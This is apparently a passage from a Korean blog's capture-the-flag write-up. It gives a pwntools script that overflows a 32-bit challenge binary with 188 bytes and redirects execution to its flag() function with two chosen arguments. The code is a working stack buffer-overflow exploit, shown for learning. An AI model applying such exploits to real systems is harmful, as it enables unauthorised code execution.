728x90
0xdeadbeef = -0x21524111, 0xc0ded00d = -0x3f212ff3으로 변환 가능
그러므로
from pwn import *
context.update(arch="i386", os="linux")
elf = ELF("./vuln")
# offset to reach right before return address's location
offset = b"A" * 188
# craft exploit: offset + flag() + padding + parameter 1 + parameter 2
exploit = offset + p32(elf.symbols['flag'], endian="little") + p32(0x90909090) + p32(0xdeadbeef, endian="little") + p32(0xc0ded00d, endian="little")
r = elf.process()
r.sendlineafter(":", exploit)
r.interactive()
728x90
'호그와트' 카테고리의 다른 글
파벳이 울트라고기 구워 먹을 때 (0) | 2023.06.12 |
---|---|
GPT4가 분석한 memcpy (0) | 2023.06.08 |
GPT-4랑 프로토스타 기본 프로그램을 가지고 직접 실습을 해보았다. (0) | 2023.06.02 |
GPT4랑 ROP chain에 대해서 토론해보니... (0) | 2023.05.31 |
Chat gpt plugins, 진짜 미쳤다 ㅋㅋㅋㅋㅋㅋㅋㅋㅋ (0) | 2023.05.23 |